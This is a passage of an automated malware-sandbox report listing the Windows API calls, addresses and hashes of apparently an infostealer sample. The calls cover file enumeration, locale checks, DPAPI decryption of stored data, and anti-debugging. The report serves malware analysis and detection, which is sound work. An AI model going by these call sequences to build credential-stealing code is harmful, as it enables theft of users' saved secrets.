                                                  • Associated: 00000000.00000002.2279322736.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                                  • String ID: P2#v$\*.*$1#v
                                                  • API String ID: 1415058207-2075649900
                                                  • Opcode ID: 262c42444cbb4c7113c8ff6840b6909aa1d326ae395afc5a71cd8ea782e15d4f
                                                  • Instruction ID: 47de987318eafb428d6e9afc63df3879dd5ba7490b623eb573f4dfe72a2f4575
                                                  • Opcode Fuzzy Hash: 262c42444cbb4c7113c8ff6840b6909aa1d326ae395afc5a71cd8ea782e15d4f
                                                  • Instruction Fuzzy Hash: 641260719111189BCB15FB61CD96EEE7338AF14314F4045AEB10A62091EF386FDACFA9
                                                  APIs
                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                    • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                    • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00420D73), ref: 0040E4A2
                                                  • StrCmpCA.SHLWAPI(?,004214F8), ref: 0040E4F2
                                                  • StrCmpCA.SHLWAPI(?,004214FC), ref: 0040E508
                                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0040EBDF
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2279322736.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2279322736.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                                  • String ID: P2#v$\*.*$1#v$@
                                                  • API String ID: 433455689-1092267622
                                                  • Opcode ID: f66feada1159486c5f539b2798b5b41736558756ad5056c64c98908e290d890f
                                                  • Instruction ID: 32b04220dc81db1066fec36fe382e2e0147ddb409d88bf53f78a4e8ff9751907
                                                  • Opcode Fuzzy Hash: f66feada1159486c5f539b2798b5b41736558756ad5056c64c98908e290d890f
                                                  • Instruction Fuzzy Hash: 2612D5719111189ACB14FB71DD96EED7338AF54314F4045AEB00A62091EF386FDACFAA
                                                  APIs
                                                  • wsprintfA.USER32 ref: 00B3EFA5
                                                  • FindFirstFileA.KERNEL32(?,?), ref: 00B3EFBC
                                                  • StrCmpCA.SHLWAPI(?,00421538), ref: 00B3F012
                                                  • StrCmpCA.SHLWAPI(?,0042153C), ref: 00B3F028
                                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00B3F515
                                                  • FindClose.KERNEL32(000000FF), ref: 00B3F52A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2280246170.0000000000B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Find$File$CloseFirstNextwsprintf
                                                  • String ID:
                                                  • API String ID: 180737720-0
                                                  • Opcode ID: 5017a4ae4b27de286babc421e1f90f6b26d6cd092db73d8e186e82182fbe0c2c
                                                  • Instruction ID: 086402bbe47fef76480b0da4492ed91ef2d58ef9879b5beee166b1b08ec1ca63
                                                  • Opcode Fuzzy Hash: 5017a4ae4b27de286babc421e1f90f6b26d6cd092db73d8e186e82182fbe0c2c
                                                  • Instruction Fuzzy Hash: 00E142B19512189ADB58FB64DD92EEE73B8AF54300F4041EDB44A62052EF306FC9DF52
                                                  APIs
                                                    • Part of subcall function 00B4A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B4A9EF
                                                    • Part of subcall function 00B4AB87: lstrcpy.KERNEL32(00000000,?), ref: 00B4ABD9
                                                    • Part of subcall function 00B4AB87: lstrcat.KERNEL32(00000000), ref: 00B4ABE9
                                                    • Part of subcall function 00B4AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 00B4AC2C
                                                    • Part of subcall function 00B4AC17: lstrcpy.KERNEL32(00000000), ref: 00B4AC6B
                                                    • Part of subcall function 00B4AC17: lstrcat.KERNEL32(00000000,00000000), ref: 00B4AC79
                                                    • Part of subcall function 00B4AB07: lstrcpy.KERNEL32(?,00420E17), ref: 00B4AB6C
                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004214B0,00420C2A), ref: 00B3DD52
                                                  • StrCmpCA.SHLWAPI(?,004214B4), ref: 00B3DD9A
                                                  • StrCmpCA.SHLWAPI(?,004214B8), ref: 00B3DDB0
                                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00B3E033
                                                  • FindClose.KERNEL32(000000FF), ref: 00B3E045
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2280246170.0000000000B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                                  • String ID:
                                                  • API String ID: 3334442632-0
                                                  • Opcode ID: 19e1283fff7b9399e04994cea590238412c6d56de050716b623985b6cf8af604
                                                  • Instruction ID: 3ee0d28c2cbb51ef700e3693f96d0cb1e9e4c00dfd62716c9f4c641aec63bda1
                                                  • Opcode Fuzzy Hash: 19e1283fff7b9399e04994cea590238412c6d56de050716b623985b6cf8af604
                                                  • Instruction Fuzzy Hash: 599155B29402049BCB14FFB4ED96DED73BDAF95300F5046ACB44A56141EE349B18DB92
                                                  APIs
                                                    • Part of subcall function 00B4A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B4A9EF
                                                    • Part of subcall function 00B4AB87: lstrcpy.KERNEL32(00000000,?), ref: 00B4ABD9
                                                    • Part of subcall function 00B4AB87: lstrcat.KERNEL32(00000000), ref: 00B4ABE9
                                                    • Part of subcall function 00B4AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 00B4AC2C
                                                    • Part of subcall function 00B4AC17: lstrcpy.KERNEL32(00000000), ref: 00B4AC6B
                                                    • Part of subcall function 00B4AC17: lstrcat.KERNEL32(00000000,00000000), ref: 00B4AC79
                                                    • Part of subcall function 00B4AB07: lstrcpy.KERNEL32(?,00420E17), ref: 00B4AB6C
                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004215B8,00420D96), ref: 00B3F985
                                                  • StrCmpCA.SHLWAPI(?,004215BC), ref: 00B3F9D6
                                                  • StrCmpCA.SHLWAPI(?,004215C0), ref: 00B3F9EC
                                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00B3FD18
                                                  • FindClose.KERNEL32(000000FF), ref: 00B3FD2A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2280246170.0000000000B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                                  • String ID:
                                                  • API String ID: 3334442632-0
                                                  • Opcode ID: 876e2798c7396c4a4386e432ec3129558d1ad4a2c594bc6eff74cfd2f440caaf
                                                  • Instruction ID: 5e9995671e82133580747e2d4657a7ed8d150a83fd31038a6e6b70dbcda29692
                                                  • Opcode Fuzzy Hash: 876e2798c7396c4a4386e432ec3129558d1ad4a2c594bc6eff74cfd2f440caaf
                                                  • Instruction Fuzzy Hash: 25B14FB19402189BCB24FF64DD96FEE73B9AF54300F5081E9E44A56191EF309B48DF92
                                                  APIs
                                                    • Part of subcall function 00B4A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B4A9EF
                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0042511C,?,?,?,004251C4,?,?,00000000,?,00000000), ref: 00B31B8A
                                                  • StrCmpCA.SHLWAPI(?,0042526C), ref: 00B31BDA
                                                  • StrCmpCA.SHLWAPI(?,00425314), ref: 00B31BF0
                                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00B31FA7
                                                  • DeleteFileA.KERNEL32(00000000), ref: 00B32031
                                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00B32087
                                                  • FindClose.KERNEL32(000000FF), ref: 00B32099
                                                    • Part of subcall function 00B4AB87: lstrcpy.KERNEL32(00000000,?), ref: 00B4ABD9
                                                    • Part of subcall function 00B4AB87: lstrcat.KERNEL32(00000000), ref: 00B4ABE9
                                                    • Part of subcall function 00B4AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 00B4AC2C
                                                    • Part of subcall function 00B4AC17: lstrcpy.KERNEL32(00000000), ref: 00B4AC6B
                                                    • Part of subcall function 00B4AC17: lstrcat.KERNEL32(00000000,00000000), ref: 00B4AC79
                                                    • Part of subcall function 00B4AB07: lstrcpy.KERNEL32(?,00420E17), ref: 00B4AB6C
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2280246170.0000000000B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                                  • String ID:
                                                  • API String ID: 1415058207-0
                                                  • Opcode ID: 938f2ba7dd2a3d64883e0b34e36389f7e533753778dd0480aca93901e7f43848
                                                  • Instruction ID: aa7f83b041bc0510a954b794323d91a31d9e4630ca86609b1a4697af2521a1a8
                                                  • Opcode Fuzzy Hash: 938f2ba7dd2a3d64883e0b34e36389f7e533753778dd0480aca93901e7f43848
                                                  • Instruction Fuzzy Hash: 27122EB19902189BCB19FB64CD96EEDB3B9AF54700F4045EDB50A62091EF306F88DF52
                                                  APIs
                                                    • Part of subcall function 00B4A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B4A9EF
                                                    • Part of subcall function 00B4AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 00B4AC2C
                                                    • Part of subcall function 00B4AC17: lstrcpy.KERNEL32(00000000), ref: 00B4AC6B
                                                    • Part of subcall function 00B4AC17: lstrcat.KERNEL32(00000000,00000000), ref: 00B4AC79
                                                    • Part of subcall function 00B4AB07: lstrcpy.KERNEL32(?,00420E17), ref: 00B4AB6C
                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,004214C0,00420C2E), ref: 00B3E0C5
                                                  • StrCmpCA.SHLWAPI(?,004214C8), ref: 00B3E115
                                                  • StrCmpCA.SHLWAPI(?,004214CC), ref: 00B3E12B
                                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00B3E647
                                                  • FindClose.KERNEL32(000000FF), ref: 00B3E659
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2280246170.0000000000B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                                  • String ID:
                                                  • API String ID: 2325840235-0
                                                  • Opcode ID: d4d8f9a0da4a9b9920f9e464ba6309a1b6ed10e747b0e3dce0e8f9b123024142
                                                  • Instruction ID: 66211ccb5c3d5170eb37f1af0b49385364645cf72a525cb09c0e2e8cd6d418a6
                                                  • Opcode Fuzzy Hash: d4d8f9a0da4a9b9920f9e464ba6309a1b6ed10e747b0e3dce0e8f9b123024142
                                                  • Instruction Fuzzy Hash: 0AF101B19542189ACB19FB64DD95EEEB3B8BF14700F4051DEB44A62091EF306F88DF51
                                                  APIs
                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                  • GetKeyboardLayoutList.USER32(00000000,00000000,004205AF), ref: 00417BE1
                                                  • LocalAlloc.KERNEL32(00000040,?), ref: 00417BF9
                                                  • GetKeyboardLayoutList.USER32(?,00000000), ref: 00417C0D
                                                  • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00417C62
                                                  • LocalFree.KERNEL32(00000000), ref: 00417D22
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2279322736.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2279322736.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                                  • String ID: /
                                                  • API String ID: 3090951853-4001269591
                                                  • Opcode ID: 1912af0442f4f1b3bb0e5bffceb408ffebc7a006be0e67e5919f9285ea41dafa
                                                  • Instruction ID: 4337a3d4516c1007e731de4e6e4702528bfdb1ea37c67bd3aa396c5a1b158d15
                                                  • Opcode Fuzzy Hash: 1912af0442f4f1b3bb0e5bffceb408ffebc7a006be0e67e5919f9285ea41dafa
                                                  • Instruction Fuzzy Hash: 6B415E71941118ABDB24DB94DC99FEEB378FF44714F20419AE10962281DB382FC6CFA5
                                                  APIs
                                                  • memset.MSVCRT ref: 00B3CABA
                                                  • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00B3CAD8
                                                  • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00B3CAE3
                                                  • memcpy.MSVCRT(?,?,?), ref: 00B3CB79
                                                  • lstrcat.KERNEL32(?,00420B46), ref: 00B3CBAA
                                                  • lstrcat.KERNEL32(?,00420B47), ref: 00B3CBBE
                                                  • lstrcat.KERNEL32(?,00420B4E), ref: 00B3CBDF
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2280246170.0000000000B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcat$BinaryCryptStringlstrlenmemcpymemset
                                                  • String ID:
                                                  • API String ID: 1498829745-0
                                                  • Opcode ID: 8afa8c5297eb8f4e39a0d79a998b97b224f9fa32b0e1124346c3568978b0ec32
                                                  • Instruction ID: e4eaa9611bee84f8e6e3627e47e76c37d478ec74534ed15edda943a81763bd0e
                                                  • Opcode Fuzzy Hash: 8afa8c5297eb8f4e39a0d79a998b97b224f9fa32b0e1124346c3568978b0ec32
                                                  • Instruction Fuzzy Hash: A9414D7894421AEFDB10DFE4DD89BEEFBB8FB44304F1045A8E609A6280D7745A84CF91
                                                  APIs
                                                  • memset.MSVCRT ref: 0040C853
                                                  • lstrlenA.KERNEL32(?,00000001,?,00000000,00000000,00000000,00000000,?,00849AD8), ref: 0040C871
                                                  • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0040C87C
                                                  • memcpy.MSVCRT(?,?,?), ref: 0040C912
                                                  • lstrcatA.KERNEL32(?,00420B46), ref: 0040C943
                                                  • lstrcatA.KERNEL32(?,00420B47), ref: 0040C957
                                                  • lstrcatA.KERNEL32(?,00420B4E), ref: 0040C978
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2279322736.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2279322736.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcat$BinaryCryptStringlstrlenmemcpymemset
                                                  • String ID:
                                                  • API String ID: 1498829745-0
                                                  • Opcode ID: df20d881f5c4e2d2d6bfb338d3498bb03429a4b2b91fe4cc56399575628a5faf
                                                  • Instruction ID: 73a89fe7b99aa7d2364cb4d3d60341f0774d48a816bcca14cb071eff5a8018ea
                                                  • Opcode Fuzzy Hash: df20d881f5c4e2d2d6bfb338d3498bb03429a4b2b91fe4cc56399575628a5faf
                                                  • Instruction Fuzzy Hash: 694164B8944219EFDB10DFE4DD89BEEBBB8BB44304F1041A9F509A6280D7745A84CF95
                                                  APIs
                                                  • GetSystemTime.KERNEL32(0042110C,?,?,00416B11,00000000,?,00849958,?,0042110C,?,00000000,?), ref: 0041696C
                                                  • sscanf.NTDLL ref: 00416999
                                                  • SystemTimeToFileTime.KERNEL32(0042110C,00000000,?,?,?,?,?,?,?,?,?,?,?,00849958,?,0042110C), ref: 004169B2
                                                  • SystemTimeToFileTime.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,00849958,?,0042110C), ref: 004169C0
                                                  • ExitProcess.KERNEL32 ref: 004169DA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2279322736.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2279322736.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Time$System$File$ExitProcesssscanf
                                                  • String ID: B
                                                  • API String ID: 2533653975-2248957098
                                                  • Opcode ID: 985d0f7d058ad0055831b2a8c0dcfb999921c7243e7ebcfc815c5d09d464317a
                                                  • Instruction ID: bc3f4e88d18d0d52d27c53656958a280d832632e1993de176dacc6bdaed8f038
                                                  • Opcode Fuzzy Hash: 985d0f7d058ad0055831b2a8c0dcfb999921c7243e7ebcfc815c5d09d464317a
                                                  • Instruction Fuzzy Hash: A421BAB5D14208AFDF04EFE4D9459EEB7B6FF48300F04852EE506A3250EB349645CB69
                                                  APIs
                                                  • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409AEF
                                                  • LocalAlloc.KERNEL32(00000040,?,?,?,00404EEE,00000000,?), ref: 00409B01
                                                  • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409B2A
                                                  • LocalFree.KERNEL32(?,?,?,?,00404EEE,00000000,?), ref: 00409B3F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2279322736.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2279322736.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: BinaryCryptLocalString$AllocFree
                                                  • String ID: N@
                                                  • API String ID: 4291131564-4229412743
                                                  • Opcode ID: ac1203beb7ec4e86d603382bfe2e0b1b189ebd62ea0cb8a2a83c29bdd00d5e6f
                                                  • Instruction ID: b446a55777cc1d1e4698a5b325ac1ac72e8f4b69ff9cac50ab15cfe2fa8c9284
                                                  • Opcode Fuzzy Hash: ac1203beb7ec4e86d603382bfe2e0b1b189ebd62ea0cb8a2a83c29bdd00d5e6f
                                                  • Instruction Fuzzy Hash: 4811A4B4240208BFEB10CFA4DC95FAA77B5FB89714F208059FA159B3D0C776A901CB54
                                                  APIs
                                                    • Part of subcall function 00B4A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B4A9EF
                                                  • GetKeyboardLayoutList.USER32(00000000,00000000,004205AF), ref: 00B47E48
                                                  • LocalAlloc.KERNEL32(00000040,?), ref: 00B47E60
                                                  • GetKeyboardLayoutList.USER32(?,00000000), ref: 00B47E74
                                                  • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00B47EC9
                                                  • LocalFree.KERNEL32(00000000), ref: 00B47F89
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2280246170.0000000000B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                                  • String ID:
                                                  • API String ID: 3090951853-0
                                                  • Opcode ID: 7596f6bab02a8893db2d538185692abed2554d8effdd32d34ab9a344058ae76c
                                                  • Instruction ID: 14ade359aab7fc622b1171c178f0f6d825fa5223ec3e90c0ba0f6f3e583bb753
                                                  • Opcode Fuzzy Hash: 7596f6bab02a8893db2d538185692abed2554d8effdd32d34ab9a344058ae76c
                                                  • Instruction Fuzzy Hash: 72414DB1984218ABDB24DF94DC89FEDB7B8FB44700F2041D9E009A6191DB742F89DF91
                                                  APIs
                                                  • IsDebuggerPresent.KERNEL32 ref: 00B4BE09
                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00B4BE1E
                                                  • UnhandledExceptionFilter.KERNEL32(0041F2A8), ref: 00B4BE29
                                                  • GetCurrentProcess.KERNEL32(C0000409), ref: 00B4BE45
                                                  • TerminateProcess.KERNEL32(00000000), ref: 00B4BE4C
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2280246170.0000000000B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                  • String ID:
                                                  • API String ID: 2579439406-0
                                                  • Opcode ID: 1cd9910441f070b69687b64f652d04a4c8002016f1137d447a2cc91201b04508
                                                  • Instruction ID: 008f3e999c5d87c5e17d0d06f195860d3fdff1fbd0a5bd31dc667a006c63ca1f
                                                  • Opcode Fuzzy Hash: 1cd9910441f070b69687b64f652d04a4c8002016f1137d447a2cc91201b04508
                                                  • Instruction Fuzzy Hash: D621C3BC9002059FDB14DF29F889A963BF4FB0A304F10407AE90987265EBB05981EF49
                                                  APIs
                                                  • IsDebuggerPresent.KERNEL32 ref: 0041BBA2
                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0041BBB7
                                                  • UnhandledExceptionFilter.KERNEL32(0041F2A8), ref: 0041BBC2
                                                  • GetCurrentProcess.KERNEL32(C0000409), ref: 0041BBDE
                                                  • TerminateProcess.KERNEL32(00000000), ref: 0041BBE5
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2279322736.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2279322736.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                  • String ID:
                                                  • API String ID: 2579439406-0
                                                  • Opcode ID: 1cd9910441f070b69687b64f652d04a4c8002016f1137d447a2cc91201b04508
                                                  • Instruction ID: 2759986af63cf1bc905e0f8428f5e2b998159022a12c47e0d709fe691c65c3be
                                                  • Opcode Fuzzy Hash: 1cd9910441f070b69687b64f652d04a4c8002016f1137d447a2cc91201b04508
                                                  • Instruction Fuzzy Hash: E921A3BC9002059FDB10DF69FD89A963BE4FB0A314F50403AE90A87264DBB45981EF4D
                                                  APIs
                                                  • GetProcessHeap.KERNEL32(00000008,00000400), ref: 00B374B4
                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00B374BB
                                                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00B374E8
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 00B3750B
                                                  • LocalFree.KERNEL32(?), ref: 00B37515
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2280246170.0000000000B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                                  • String ID:
                                                  • API String ID: 2609814428-0
                                                  • Opcode ID: 0aad0ca02a207947d5fd575ebfc9b9b208dd2f880e8fc230de4336e6f6e6e563
                                                  • Instruction ID: 61c0697973e8cb6c096730c290f44cd85d4800289a15fc5a9aeba4f5713c6f9d
                                                  • Opcode Fuzzy Hash: 0aad0ca02a207947d5fd575ebfc9b9b208dd2f880e8fc230de4336e6f6e6e563
                                                  • Instruction Fuzzy Hash: ED0112B5B80208BFEB14DFD4DD45F9D77B9EB44704F104155F705AB2C0DA70AA008B65
                                                  APIs
                                                  • GetProcessHeap.KERNEL32(00000008,00000400,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90), ref: 0040724D
                                                  • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407254
                                                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00407281
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000,?,?,?,?,?,00407C90,80000001,004161C4), ref: 004072A4
